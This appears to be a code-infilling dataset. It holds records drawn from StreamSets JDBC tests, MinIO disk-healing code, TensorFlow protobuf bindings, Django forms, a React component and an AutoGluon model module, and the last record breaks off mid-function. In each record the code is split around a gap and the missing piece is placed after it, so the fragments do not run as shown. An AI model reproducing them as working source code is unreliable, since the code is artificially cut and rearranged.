database.engine.execute(f'CREATE TABLE {table_name} (id VARCHAR(20) NOT NULL PRIMARY KEY, a VARCHAR(10));')
field_to_column_mapping = [dict(columnName='ID',
dataType='USE_COLUMN_TYPE',
field='/0',
paramValue='?'),
dict(columnName='A',
dataType='USE_COLUMN_TYPE',
field='/1',
paramValue='?')]
jdbc_producer = pipeline_builder.add_stage('JDBC Producer')
jdbc_producer.set_attributes(default_operation="INSERT",
schema_name=DEFAULT_DB2_SCHEMA,
table_name=table_name,
field_to_column_mapping=field_to_column_mapping,
stage_on_record_error='TO_ERROR',
data_sqlstate_codes=["22001"])
directory >> jdbc_producer
directory_jdbc_producer_pipeline = pipeline_builder.build(
title='Directory - JDBC Producer. Test DB2 sql code error').configure_for_environment(database)
sdc_executor.add_pipeline(directory_jdbc_producer_pipeline)
try:
snapshot = sdc_executor.capture_snapshot(directory_jdbc_producer_pipeline, start_pipeline=True, batch_size=1,
batches=5).snapshot
sdc_executor.stop_pipeline(directory_jdbc_producer_pipeline)
assert 5 == len(snapshot.snapshot_batches)
result = database.engine.execute(f'SELECT ID,A FROM {table_name};')
data_from_database = sorted(result.fetchall(), key=lambda row: row[1]) # Order by id.
result.close()
# Assert records in database include from id=1 to id=4 excluding id=5. Columns => record[0] = id, record[1] = a.
assert data_from_database == [(record[0], record[1]) for record in
[unified_record.split(',') for unified_record in csv_records[:-1]]]
stage = snapshot.snapshot_batches[4][jdbc_producer.instance_name]
assert 1 == len(stage.error_records)
error_record = stage.error_records[0]
assert 'hellolargerword' == error_record.field['1']
assert 'JDBC_14' == error_record.header['errorCode']
assert 'SQLSTATE=22001' in error_record.header['errorMessage']
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
database.engine.execute(f'DROP TABLE {table_name}')
def _setup_delimited_file(sdc_executor, tmp_directory, csv_records):
"""Setup csv records and save in local system. The pipelines looks like:
dev_raw_data_source >> local_fs
"""
raw_data = "\n".join(csv_records)
pipeline_builder = sdc_executor.get_pipeline_builder()
dev_raw_data_source = pipeline_builder.add_stage('Dev Raw Data Source')
dev_raw_data_source.set_attributes(data_format='TEXT', raw_data=raw_data, stop_after_first_batch=True)
local_fs = pipeline_builder.add_stage('Local FS', type='destination')
local_fs.set_attributes(data_format='TEXT',
directory_template=tmp_directory,
files_prefix='sdc-${sdc:id()}', files_suffix='csv')
dev_raw_data_source >> local_fs
files_pipeline = pipeline_builder.build('Generate files pipeline')
sdc_executor.add_pipeline(files_pipeline)
# Generate some batches/files.
sdc_executor.start_pipeline(files_pipeline).wait_for_finished(timeout_sec=5)
return csv_records
# SDC-13556: Do not spin JDBC Destination and Tee Processor machinery for empty batches
@sdc_min_version('3.14.0')
@database('mysql')
@pytest.mark.parametrize('use_multi_row', [True, False])
def test_jdbc_tee_commits_on_empty_batches(use_multi_row, sdc_builder, sdc_executor, database):
"""Ensure that the JDBC Tee processor won't generate commits on empty batches. Since it's generally difficult
to create empty batches in SDC, we use scripting origin to generate them and then check commit timer (which also
contains count) to ensure that we don't generate excessive commits on the database."""
builder = sdc_builder.get_pipeline_builder()
table_name = get_random_string(string.ascii_lowercase, 20)
script = """
// First batch contains exactly one record
var batch = sdc.createBatch();
var record = sdc.createRecord('generated data');
record.value = {'name': 'A'};
batch.add(record);
batch.process("batch", "non-empty");
// Sent 1000 batches that will be empty
var step;
for (step = 0; step < 1000; step++) {
batch = sdc.createBatch();
batch.process("whatever", "batch-" + step);
}
"""
origin = builder.add_stage('JavaScript Scripting')
origin.record_type='NATIVE_OBJECTS'
origin.user_script=script
tee = builder.add_stage('JDBC Tee')
tee.default_operation = 'INSERT'
tee.field_to_column_mapping = [dict(columnName='name', field='/name', paramValue='?')]
tee.generated_column_mappings = [dict(columnName='id', field='/id')]
tee.table_name = table_name
tee.use_multi_row_operation = use_multi_row
trash = builder.add_stage('Trash')
origin >> tee >> trash
pipeline = builder.build().configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
table = _create_table(table_name, database)
try:
sdc_executor.start_pipeline(pipeline).wait_for_finished()
# First of all, verify that the table have exactly one record with expected values
result = database.engine.execute(table.select())
db = sorted(result.fetchall(), key=lambda row: row[1]) # order by id
result.close()
assert len(db) == 1
assert db[0][0] == 'A'
assert db[0][1] == 1
# Second of all, we should see exactly 1001 batches generated by our scripting origin
history = sdc_executor.get_pipeline_history(pipeline)
assert history.latest.metrics.counter('pipeline.batchCount.counter').count == 1001
# Then let's explore how many commits have we generated to ensure that we don't have 1001 commits
expected_commits = 1 if use_multi_row else 2
assert history.latest.metrics.timer('custom.JDBCTee_01.Commit Timer.0.timer').count == expected_commits
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
table.drop(database.engine)
@database
@sdc_min_version('3.15.0')
def test_multitable_quote_column_names(sdc_builder, sdc_executor, database):
"""
Ensure that we properly quote all table and column names when querying the database.
"""
table_name = "table_" + get_random_string(string.ascii_letters, 10)
offset_name = "column_" + get_random_string(string.ascii_letters, 10)
builder = sdc_builder.get_pipeline_builder()
origin = builder.add_stage('JDBC Multitable Consumer')
origin.table_configs=[{"tablePattern": f'%{table_name}%'}]
origin.max_batch_size_in_records = 10
trash = builder.add_stage('Trash')
origin >> trash
pipeline = builder.build().configure_for_environment(database)
# Work-arounding STF behavior of upper-casing table name configuration
origin.table_configs[0]["tablePattern"] = f'%{table_name}%'
metadata = sqlalchemy.MetaData()
table = sqlalchemy.Table(
table_name,
metadata,
sqlalchemy.Column(offset_name, sqlalchemy.Integer, primary_key=True, quote=True),
quote = True
)
try:
logger.info('Creating table %s in %s database ...', table_name, database.type)
table.create(database.engine)
logger.info('Adding three rows into %s database ...', database.type)
connection = database.engine.connect()
connection.execute(table.insert(), [{offset_name: 1}])
sdc_executor.add_pipeline(pipeline)
snapshot = sdc_executor.capture_snapshot(pipeline=pipeline, start_pipeline=True).snapshot
# We want to run for a few seconds to see if any errors show up (like that did in previous versions)
time.sleep(10)
sdc_executor.stop_pipeline(pipeline)
# There should be no errors reported
history = sdc_executor.get_pipeline_history(pipeline)
assert history.latest.metrics.counter('stage.JDBCMultitableConsumer_01.errorRecords.counter').count == 0
assert history.latest.metrics.counter('stage.JDBCMultitableConsumer_01.stageErrors.counter').count == 0
# And verify that we properly read that one record
assert len(snapshot[origin].output) == 1
assert snapshot[origin].output[0].get_field_data('/' + offset_name) == 1
finally:
logger.info('Dropping table %s in %s database...', table_name, database.type)
table.drop(database.engine)
@database
@sdc_min_version('3.0.0.0')
def test_jdbc_multitable_consumer_duplicates_read_when_initial_offset_configured(sdc_builder, sdc_executor, database):
"""
SDC-13625 Integration test for SDC-13624 - MT Consumer ingests duplicates when initial offset is specified
Setup origin as follows:
partitioning enabled + num_threads and num partitions > 1 + override offset column set
+ initial value specified for offset
Verify that origin does not ingest the records more than once (duplicates) when initial value for offset is set
Pipeline:
JDBC MT Consumer >> Trash
>= Pipeline Finisher (no-more-data)
"""
if database.type == 'Oracle':
pytest.skip("This test depends on proper case for column names that Oracle auto-uppers.")
src_table_prefix = get_random_string(string.ascii_lowercase, 6)
table_name = '{}_{}'.format(src_table_prefix, get_random_string(string.ascii_lowercase, 20))
pipeline_builder = sdc_builder.get_pipeline_builder()
jdbc_multitable_consumer = pipeline_builder.add_stage('JDBC Multitable Consumer')
jdbc_multitable_consumer.set_attributes(table_configs=[{
"tablePattern": f'{table_name}',
"enableNonIncremental": False,
"partitioningMode": "REQUIRED",
"partitionSize": "100000",
"maxNumActivePartitions": 5,
'overrideDefaultOffsetColumns': True,
'offsetColumns': ['created'],
'offsetColumnToInitialOffsetValue': [{
'key': 'created',
'value': '0'
}]
}])
jdbc_multitable_consumer.number_of_threads = 2
jdbc_multitable_consumer.maximum_pool_size = 2
trash = pipeline_builder.add_stage('Trash')
jdbc_multitable_consumer >> trash
finisher = pipeline_builder.add_stage("Pipeline Finisher Executor")
finisher.stage_record_preconditions = ['${record:eventType() == "no-more-data"}']
jdbc_multitable_consumer >= finisher
pipeline = pipeline_builder.build().configure_for_environment(database)
ONE_MILLION = 1000000
rows_in_table = [{'id': i, 'name': get_random_string(string.ascii_lowercase, 5), 'created': i + ONE_MILLION}
for i in range(1, 21)]
metadata = sqlalchemy.MetaData()
table = sqlalchemy.Table(
table_name,
metadata,
sqlalchemy.Column('id', sqlalchemy.Integer, primary_key=True),
sqlalchemy.Column('name', sqlalchemy.String(5)),
sqlalchemy.Column('created', sqlalchemy.Integer)
)
try:
logger.info('Creating table %s in %s database ...', table_name, database.type)
table.create(database.engine)
logger.info('Adding 20 rows into %s table', table_name)
connection = database.engine.connect()
connection.execute(table.insert(), rows_in_table)
connection.close()
sdc_executor.add_pipeline(pipeline)
snapshot = sdc_executor.capture_snapshot(pipeline=pipeline, batches=2, start_pipeline=True).snapshot
rows_from_snapshot = [(record.get_field_data('/name').value,
record.get_field_data('/id').value,
record.get_field_data('/created').value)
for batch in snapshot.snapshot_batches
for record in batch.stage_outputs[jdbc_multitable_consumer.instance_name].output]
expected_data = [(row['name'], row['id'], row['created']) for row in rows_in_table]
assert rows_from_snapshot == expected_data
finally:
logger.info('Dropping table %s in %s database...', table_name, database.type)
table.drop(database.engine)
| """Ensure that the Query consumer can resume where it ended and stop the pipeline when it reads all the data."""
if isinstance(database, OracleDatabase):
pytest.skip('This test does not support oracle and its upper casing of column names.')
metadata = sqlalchemy.MetaData()
table_name = get_random_string(string.ascii_lowercase, 20)
table = sqlalchemy.Table(
table_name,
metadata,
sqlalchemy.Column('id', sqlalchemy.Integer, primary_key=True),
sqlalchemy.Column('name', sqlalchemy.String(32))
)
pipeline_builder = sdc_builder.get_pipeline_builder()
origin = pipeline_builder.add_stage('JDBC Query Consumer')
origin.incremental_mode = True
origin.sql_query = 'SELECT * FROM {0} WHERE '.format(table_name) + 'id > ${OFFSET} ORDER BY id'
origin.initial_offset = '0'
origin.offset_column = 'id'
trash = pipeline_builder.add_stage('Trash')
origin >> trash
finisher = pipeline_builder.add_stage("Pipeline Finisher Executor")
origin >= finisher
pipeline = pipeline_builder.build().configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
try:
logger.info('Creating table %s in %s database ...', table_name, database.type)
table.create(database.engine)
connection = database.engine.connect()
for i in range(len(ROWS_IN_DATABASE)):
# Insert one row to the database
connection.execute(table.insert(), [ROWS_IN_DATABASE[i]])
snapshot = sdc_executor.capture_snapshot(pipeline=pipeline, start_pipeline=True).snapshot
assert len(snapshot[origin].output) == 1
assert snapshot[origin].output[0].get_field_data('/id') == i + 1
# TLKT-249: Add wait_for_finished to get_status object
sdc_executor.get_pipeline_status(pipeline).wait_for_status('FINISHED')
finally:
logger.info('Dropping table %s in %s database...', table_name, database.type)
table.drop(database.engine) |
background-newdisks-heal-ops.go | /*
* MinIO Cloud Storage, (C) 2019 MinIO, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package cmd
import (
"context"
"time"
"github.com/minio/minio/cmd/logger"
)
const defaultMonitorNewDiskInterval = time.Minute * 10
func initLocalDisksAutoHeal() {
go monitorLocalDisksAndHeal()
}
// monitorLocalDisksAndHeal - ensures that detected new disks are healed
// 1. Only the concerned erasure set will be listed and healed
// 2. Only the node hosting the disk is responsible to perform the heal
func | () {
// Wait until the object layer is ready
var objAPI ObjectLayer
for {
objAPI = newObjectLayerWithoutSafeModeFn()
if objAPI == nil {
time.Sleep(time.Second)
continue
}
break
}
z, ok := objAPI.(*xlZones)
if !ok {
return
}
ctx := context.Background()
var bgSeq *healSequence
var found bool
for {
bgSeq, found = globalBackgroundHealState.getHealSequenceByToken(bgHealingUUID)
if found {
break
}
time.Sleep(time.Second)
}
// Perform automatic disk healing when a disk is replaced locally.
for {
// Attempt a heal as the server starts-up first.
localDisksInZoneHeal := make([]Endpoints, len(z.zones))
for i, ep := range globalEndpoints {
localDisksToHeal := Endpoints{}
for _, endpoint := range ep.Endpoints {
if !endpoint.IsLocal {
continue
}
// Try to connect to the current endpoint
// and reformat if the current disk is not formatted
_, _, err := connectEndpoint(endpoint)
if err == errUnformattedDisk {
localDisksToHeal = append(localDisksToHeal, endpoint)
}
}
if len(localDisksToHeal) == 0 {
continue
}
localDisksInZoneHeal[i] = localDisksToHeal
}
// Reformat disks
bgSeq.sourceCh <- SlashSeparator
// Ensure that reformatting disks is finished
bgSeq.sourceCh <- nopHeal
time.Sleep(defaultMonitorNewDiskInterval)
var erasureSetInZoneToHeal = make([][]int, len(localDisksInZoneHeal))
// Compute the list of erasure set to heal
for i, localDisksToHeal := range localDisksInZoneHeal {
var erasureSetToHeal []int
for _, endpoint := range localDisksToHeal {
// Load the new format of this passed endpoint
_, format, err := connectEndpoint(endpoint)
if err != nil {
logger.LogIf(ctx, err)
continue
}
// Calculate the set index where the current endpoint belongs
setIndex, _, err := findDiskIndex(z.zones[i].format, format)
if err != nil {
logger.LogIf(ctx, err)
continue
}
erasureSetToHeal = append(erasureSetToHeal, setIndex)
}
erasureSetInZoneToHeal[i] = erasureSetToHeal
}
// Heal all erasure sets that need
for i, erasureSetToHeal := range erasureSetInZoneToHeal {
for _, setIndex := range erasureSetToHeal {
err := healErasureSet(ctx, setIndex, z.zones[i].sets[setIndex])
if err != nil {
logger.LogIf(ctx, err)
}
}
}
}
}
| monitorLocalDisksAndHeal |
example.pb.go | // Code generated by protoc-gen-go. DO NOT EDIT.
// source: tensorflow/core/example/example.proto
/*
Package tensorflow is a generated protocol buffer package.
It is generated from these files:
tensorflow/core/example/example.proto
tensorflow/core/example/example_parser_configuration.proto
tensorflow/core/example/feature.proto
It has these top-level messages:
Example
SequenceExample
VarLenFeatureProto
FixedLenFeatureProto
FeatureConfiguration
ExampleParserConfiguration
BytesList
FloatList
Int64List
Feature
Features
FeatureList
FeatureLists
*/
package example
import proto "github.com/golang/protobuf/proto"
import fmt "fmt"
import math "math"
// Reference imports to suppress errors if they are not otherwise used.
var _ = proto.Marshal
var _ = fmt.Errorf
var _ = math.Inf
// This is a compile-time assertion to ensure that this generated file
// is compatible with the proto package it is being compiled against.
// A compilation error at this line likely means your copy of the
// proto package needs to be updated.
const _ = proto.ProtoPackageIsVersion2 // please upgrade the proto package
type Example struct {
Features *Features `protobuf:"bytes,1,opt,name=features" json:"features,omitempty"`
}
func (m *Example) Reset() { *m = Example{} }
func (m *Example) String() string { return proto.CompactTextString(m) }
func (*Example) ProtoMessage() {}
func (*Example) Descriptor() ([]byte, []int) { return fileDescriptor0, []int{0} }
func (m *Example) GetFeatures() *Features {
if m != nil {
return m.Features
}
return nil
}
type SequenceExample struct {
Context *Features `protobuf:"bytes,1,opt,name=context" json:"context,omitempty"`
FeatureLists *FeatureLists `protobuf:"bytes,2,opt,name=feature_lists,json=featureLists" json:"feature_lists,omitempty"`
}
func (m *SequenceExample) Reset() { *m = SequenceExample{} }
func (m *SequenceExample) String() string { return proto.CompactTextString(m) }
func (*SequenceExample) ProtoMessage() {}
func (*SequenceExample) Descriptor() ([]byte, []int) { return fileDescriptor0, []int{1} }
func (m *SequenceExample) GetContext() *Features {
if m != nil {
return m.Context
}
return nil
}
func (m *SequenceExample) GetFeatureLists() *FeatureLists {
if m != nil {
return m.FeatureLists
}
return nil
}
func init() {
proto.RegisterType((*Example)(nil), "tensorflow.Example")
proto.RegisterType((*SequenceExample)(nil), "tensorflow.SequenceExample")
}
func init() {
proto.RegisterFile("github.com/tensorflow/tensorflow/tensorflow/go/core/example/example.proto", fileDescriptor0)
}
var fileDescriptor0 = []byte{
// 190 bytes of a gzipped FileDescriptorProto
0x1f, 0x8b, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0xff, 0xe2, 0x52, 0x2d, 0x49, 0xcd, 0x2b,
0xce, 0x2f, 0x4a, 0xcb, 0xc9, 0x2f, 0xd7, 0x4f, 0xce, 0x2f, 0x4a, 0xd5, 0x4f, 0xad, 0x48, 0xcc,
0x2d, 0xc8, 0x81, 0xd3, 0x7a, 0x05, 0x45, 0xf9, 0x25, 0xf9, 0x42, 0x5c, 0x08, 0x65, 0x52, 0x38,
0xb5, 0xa4, 0xa5, 0x26, 0x96, 0x94, 0x16, 0x41, 0xb5, 0x28, 0x59, 0x73, 0xb1, 0xbb, 0x42, 0x24,
0x84, 0x0c, 0xb8, 0x38, 0xa0, 0x72, 0xc5, 0x12, 0x8c, 0x0a, 0x8c, 0x1a, 0xdc, 0x46, 0x22, 0x7a,
0x08, 0x43, 0xf4, 0xdc, 0xa0, 0x72, 0x41, 0x70, 0x55, 0x4a, 0x0d, 0x8c, 0x5c, 0xfc, 0xc1, 0xa9,
0x85, 0xa5, 0xa9, 0x79, 0xc9, 0xa9, 0x30, 0x53, 0xf4, 0xb8, 0xd8, 0x93, 0xf3, 0xf3, 0x4a, 0x52,
0x2b, 0x4a, 0xf0, 0x1a, 0x02, 0x53, 0x24, 0x64, 0xcb, 0xc5, 0x0b, 0x35, 0x2f, 0x3e, 0x27, 0xb3,
0xb8, 0xa4, 0x58, 0x82, 0x09, 0xac, 0x4b, 0x02, 0x8b, 0x2e, 0x1f, 0x90, 0x7c, 0x10, 0x4f, 0x1a,
0x12, 0xcf, 0x49, 0x87, 0x4b, 0x2c, 0xbf, 0x28, 0x1d, 0x59, 0x31, 0xd4, 0x9f, 0x4e, 0xbc, 0x50,
0x17, 0x05, 0x80, 0xfc, 0x59, 0x1c, 0xc0, 0xf8, 0x83, 0x91, 0x31, 0x89, 0x0d, 0xec, 0x69, 0x63,
0x40, 0x00, 0x00, 0x00, 0xff, 0xff, 0x98, 0x79, 0xef, 0x4a, 0x50, 0x01, 0x00, 0x00, | } |
|
util.go | package kons
import "regexp"
func | (path ...string) ([]*regexp.Regexp, error) {
var regs []*regexp.Regexp
for _, p := range path {
reg, err := regexp.Compile(p)
if err != nil {
return nil, err
}
regs = append(regs, reg)
}
return regs, nil
}
| PathToRegs |
forms.py | # -*- coding: utf-8 -*-
from django import forms
from django.core import validators
from modeltranslation.fields import TranslationField
class TranslationModelForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
super(TranslationModelForm, self).__init__(*args, **kwargs)
for f in self._meta.model._meta.fields:
if f.name in self.fields and isinstance(f, TranslationField):
del self.fields[f.name]
class NullCharField(forms.CharField):
"""
CharField subclass that returns ``None`` when ``CharField`` would return empty string.
"""
def to_python(self, value):
if value in validators.EMPTY_VALUES:
return None
return super(NullCharField, self).to_python(value)
class NullableField(forms.Field):
"""
Form field mixin that ensures that ``None`` is not cast to anything (like
the empty string with ``CharField`` and its derivatives).
"""
def to_python(self, value):
if value is None:
return value
return super(NullableField, self).to_python(value)
# Django 1.6
def | (self, initial, data):
if (initial is None and data is not None) or (initial is not None and data is None):
return True
return super(NullableField, self)._has_changed(initial, data)
| _has_changed |
tree-node-renderer.js | import React, { Component, Children, cloneElement } from 'react';
import PropTypes from 'prop-types';
import styles from './tree-node-renderer.scss';
class FileThemeTreeNodeRenderer extends Component {
render() {
const {
children,
listIndex,
swapFrom,
swapLength,
swapDepth,
scaffoldBlockPxWidth, // Delete from otherProps
lowerSiblingCounts,
connectDropTarget,
isOver,
draggedNode,
canDrop,
treeIndex,
treeId, // Delete from otherProps
getPrevRow, // Delete from otherProps
node, // Delete from otherProps
path, // Delete from otherProps
rowDirection, // Delete from otherProps
...otherProps
} = this.props;
return connectDropTarget(
<div {...otherProps} className={styles.node}>
{Children.map(children, child =>
cloneElement(child, {
isOver,
canDrop,
draggedNode,
lowerSiblingCounts,
listIndex,
swapFrom,
swapLength,
swapDepth,
})
)}
</div>
);
}
}
FileThemeTreeNodeRenderer.defaultProps = {
swapFrom: null,
swapDepth: null,
swapLength: null,
canDrop: false,
draggedNode: null,
};
FileThemeTreeNodeRenderer.propTypes = {
treeIndex: PropTypes.number.isRequired,
treeId: PropTypes.string.isRequired,
swapFrom: PropTypes.number,
swapDepth: PropTypes.number,
swapLength: PropTypes.number,
scaffoldBlockPxWidth: PropTypes.number.isRequired,
lowerSiblingCounts: PropTypes.arrayOf(PropTypes.number).isRequired,
listIndex: PropTypes.number.isRequired,
children: PropTypes.node.isRequired,
// Drop target | connectDropTarget: PropTypes.func.isRequired,
isOver: PropTypes.bool.isRequired,
canDrop: PropTypes.bool,
draggedNode: PropTypes.shape({}),
// used in dndManager
getPrevRow: PropTypes.func.isRequired,
node: PropTypes.shape({}).isRequired,
path: PropTypes.arrayOf(
PropTypes.oneOfType([PropTypes.string, PropTypes.number])
).isRequired,
rowDirection: PropTypes.string.isRequired,
};
export default FileThemeTreeNodeRenderer; | |
models.py | import numpy as np
import scipy.special
import os
import math
import logging
import pandas as pd
import warnings
import time
import json
import pickle
import functools
import tqdm
from typing import Tuple
from autogluon.core.scheduler.scheduler_factory import scheduler_factory
from autogluon.core.utils import set_logger_verbosity
from sklearn.preprocessing import LabelEncoder
import mxnet as mx
from mxnet.util import use_np
from mxnet.lr_scheduler import PolyScheduler, CosineScheduler
from mxnet.gluon.data import DataLoader
from autogluon_contrib_nlp.models import get_backbone
from autogluon_contrib_nlp.lr_scheduler import InverseSquareRootScheduler
from autogluon_contrib_nlp.utils.config import CfgNode
from autogluon_contrib_nlp.utils.misc import grouper, \
count_parameters, repeat, get_mxnet_available_ctx
from autogluon_contrib_nlp.utils.parameter import move_to_ctx, clip_grad_global_norm
from autogluon.core import args, space
from autogluon.core.utils import in_ipynb, verbosity2loglevel
from autogluon.core.utils.utils import get_cpu_count, get_gpu_count
from autogluon.core.utils.loaders import load_pkl, load_pd
from autogluon.core.task.base import compile_scheduler_options_v2
from autogluon.core.task.base.base_task import schedulers
from autogluon.core.metrics import get_metric, Scorer
from autogluon.core.utils.multiprocessing_utils import force_forkserver
from autogluon.core.dataset import TabularDataset
from autogluon.core.decorator import sample_config
from autogluon.core.constants import BINARY, MULTICLASS, REGRESSION
from autogluon.core.scheduler.reporter import FakeReporter
from .modules import MultiModalWithPretrainedTextNN
from .preprocessing import MultiModalTextFeatureProcessor, base_preprocess_cfg,\
MultiModalTextBatchify, get_stats_string, auto_shrink_max_length, get_cls_sep_id
from .utils import average_checkpoints, set_seed
from .. import constants as _C
from ..utils import logging_config
from ..presets import ag_text_presets
from ... import version
logger = logging.getLogger(__name__) # return logger
@use_np
def get_optimizer(cfg, updates_per_epoch):
"""
Parameters
----------
cfg
Configuration
updates_per_epoch
The number of updates per training epoch
Returns
-------
optimizer
The optimizer
optimizer_params
Optimization parameters
max_update
Maximum update
"""
max_update = max(int(np.ceil(updates_per_epoch * cfg.num_train_epochs)), 3)
warmup_steps = int(np.ceil(updates_per_epoch * cfg.num_train_epochs * cfg.warmup_portion))
if cfg.lr_scheduler == 'triangular':
lr_scheduler = PolyScheduler(max_update=max_update,
base_lr=cfg.lr,
warmup_begin_lr=cfg.begin_lr,
pwr=1,
final_lr=cfg.final_lr,
warmup_steps=warmup_steps,
warmup_mode='linear')
elif cfg.lr_scheduler == 'inv_sqrt':
lr_scheduler = InverseSquareRootScheduler(warmup_steps=warmup_steps,
base_lr=cfg.lr,
warmup_init_lr=cfg.begin_lr)
elif cfg.lr_scheduler == 'constant':
lr_scheduler = None
elif cfg.lr_scheduler == 'cosine':
lr_scheduler = CosineScheduler(max_update=max_update,
base_lr=cfg.lr,
final_lr=cfg.final_lr,
warmup_steps=warmup_steps,
warmup_begin_lr=cfg.begin_lr)
else:
raise ValueError('Unsupported lr_scheduler="{}"'
.format(cfg.lr_scheduler))
optimizer_params = {'learning_rate': cfg.lr,
'wd': cfg.wd,
'lr_scheduler': lr_scheduler}
optimizer = cfg.optimizer
additional_params = {key: value for key, value in cfg.optimizer_params}
optimizer_params.update(additional_params)
return optimizer, optimizer_params, max_update
@use_np
def apply_layerwise_decay(model, layerwise_decay, backbone_name, not_included=None):
"""Apply the layer-wise gradient decay
.. math::
lr = lr * layerwise_decay^(max_depth - layer_depth)
Parameters:
----------
model
The backbone model
layerwise_decay: int
layer-wise decay power
not_included: list of str
A list or parameter names that not included in the layer-wise decay
"""
if not_included is None:
not_included = []
# consider the task specific fine-tuning layer as the last layer, following with pooler
# In addition, the embedding parameters have the smaller learning rate based on this setting.
if 'albert' in backbone_name:
# Skip if it is the ALBERT model.
return
if 'electra' in backbone_name:
# For ELECTRA, it's called all_encoder_layers
all_layers = model.encoder.all_encoder_layers
else:
# For other models, it's called all_layers
all_layers = model.encoder.all_layers
max_depth = len(all_layers) + 2
for key, value in model.collect_params().items():
if 'scores' in key:
value.lr_mult = layerwise_decay ** 0
if 'pool' in key:
value.lr_mult = layerwise_decay ** 1
if 'embed' in key:
value.lr_mult = layerwise_decay ** max_depth
for (layer_depth, layer) in enumerate(all_layers):
layer_params = layer.collect_params()
for key, value in layer_params.items():
for pn in not_included:
if pn in key:
continue
value.lr_mult = layerwise_decay ** (max_depth - (layer_depth + 1))
@use_np
def freeze_layers(model, backbone_name, num_trainable_layers):
if 'albert' in backbone_name:
# Skip if it is the ALBERT model.
return
if 'electra' in backbone_name:
# For ELECTRA, it's called all_encoder_layers
all_layers = model.encoder.all_encoder_layers
else:
# For other models, it's called all_layers
all_layers = model.encoder.all_layers
if num_trainable_layers < 0:
return
assert num_trainable_layers <= len(all_layers)
for i in range(len(all_layers) - num_trainable_layers):
for p in all_layers[i].collect_params().values():
p.grad_req = 'null'
return
def base_optimization_config():
"""The basic optimization phase"""
cfg = CfgNode()
cfg.lr_scheduler = 'triangular'
cfg.optimizer = 'adamw'
cfg.early_stopping_patience = 20 # Stop if we cannot find a better checkpoint
cfg.optimizer_params = [('beta1', 0.9),
('beta2', 0.999),
('epsilon', 1e-6),
('correct_bias', False)]
cfg.begin_lr = 0.0
cfg.batch_size = 128
cfg.nbest = 1 # Keep the top K performed models
cfg.per_device_batch_size = 16 # Per-device batch-size
cfg.auto_per_device_batch_size = True # Whether to automatically determine the runnable
# per-device batch_size.
cfg.val_batch_size_mult = 2 # By default, we 2X the batch size for validation
cfg.lr = 1E-4
cfg.final_lr = 0.0
cfg.num_train_epochs = 10
cfg.warmup_portion = 0.1
cfg.layerwise_lr_decay = 0.8 # The layer_wise decay
cfg.wd = 0.01 # Weight Decay
cfg.max_grad_norm = 1.0 # Maximum Gradient Norm
# The validation frequency = validation frequency * num_updates_in_an_epoch
cfg.valid_frequency = 0.2
# Logging frequency = log frequency * num_updates_in_an_epoch
cfg.log_frequency = 0.05
return cfg
def base_model_config():
cfg = CfgNode()
cfg.backbone = CfgNode()
cfg.backbone.name = 'google_electra_base'
cfg.network = MultiModalWithPretrainedTextNN.get_cfg()
cfg.num_trainable_layers = -1 # Use a negative number to indicate that all layers are trainable.
cfg.insert_sep = True # Whether to insert sep tokens between columns
cfg.train_stochastic_chunk = False # Whether to sample a stochastic chunk from the training text
cfg.test_stochastic_chunk = False # Whether to use stochastic chunk in testing
cfg.use_avg_nbest = False # Whether to average the top performed models and use that as the final model.
# This will usually give us better performance.
cfg._disable_update = False # This is a hack for trying to disable the update. Should not be used usually
cfg.inference_num_repeat = 1 # Whether to turn on randomness and repeat the inference for multiple times.
return cfg
def base_misc_config():
cfg = CfgNode()
cfg.seed = 123
cfg.exp_dir = './autonlp'
return cfg
def base_cfg():
cfg = CfgNode()
cfg.version = 1
cfg.optimization = base_optimization_config()
cfg.preprocessing = base_preprocess_cfg()
cfg.model = base_model_config()
cfg.misc = base_misc_config()
cfg.freeze()
return cfg
@use_np
def _classification_regression_predict(net, dataloader, problem_type, label_scaler,
has_label=True, extract_embedding=False,
num_repeat=1):
"""
Parameters
----------
net
The network
dataloader
The dataloader
problem_type
Types of the labels
label_scaler
Label scaler. We will reverse the centering process for regression problem
has_label
Whether label is used
extract_embedding
Whether to extract the embedding
num_repeat
The number of repeats to get the prediction.
If it is larger than 1, we will average the predictions.
If it is a regression problem, we will directly average the outputs.
If it is a classification problem, we will average the logits
Returns
-------
predictions
The predictions
"""
import warnings
# Filter mxnet warnings
warnings.filterwarnings('ignore', module='mxnet')
predictions = [[] for _ in range(num_repeat)]
use_logits = num_repeat > 1 and (problem_type == MULTICLASS or problem_type == BINARY)\
and not extract_embedding
if use_logits:
logits = [[] for _ in range(num_repeat)]
ctx_l = net.collect_params().list_ctx()
for i in range(num_repeat):
for sample_l in grouper(dataloader, len(ctx_l)):
iter_pred_l = []
if use_logits:
iter_logits_l = []
for sample, ctx in zip(sample_l, ctx_l):
if sample is None:
continue
if has_label:
batch_feature, batch_label = sample
else:
batch_feature = sample
batch_feature = move_to_ctx(batch_feature, ctx)
if extract_embedding:
_, embeddings = net(batch_feature)
iter_pred_l.append(embeddings)
else:
pred = net(batch_feature)
if problem_type == MULTICLASS or problem_type == BINARY:
if num_repeat > 1:
iter_logits_l.append(pred)
pred = mx.npx.softmax(pred, axis=-1)
iter_pred_l.append(pred)
for pred in iter_pred_l:
predictions[i].append(pred.asnumpy())
if use_logits:
for ele in iter_logits_l:
logits[i].append(ele.asnumpy())
predictions[i] = np.concatenate(predictions[i], axis=0)
if problem_type == REGRESSION and not extract_embedding:
predictions[i] = label_scaler.inverse_transform(predictions[i])[:, 0]
if use_logits:
logits[i] = np.concatenate(logits[i], axis=0)
if num_repeat == 1:
return predictions[0]
else:
if use_logits:
logits = np.stack(logits, axis=0).mean(axis=0)
return scipy.special.softmax(logits, axis=-1)
else:
return np.stack(predictions, axis=0).mean(axis=0)
def calculate_metric(scorer, ground_truth, predictions, problem_type):
if problem_type == BINARY and scorer.name == 'roc_auc':
# For ROC_AUC, we need to feed in the probability of positive class to the scorer.
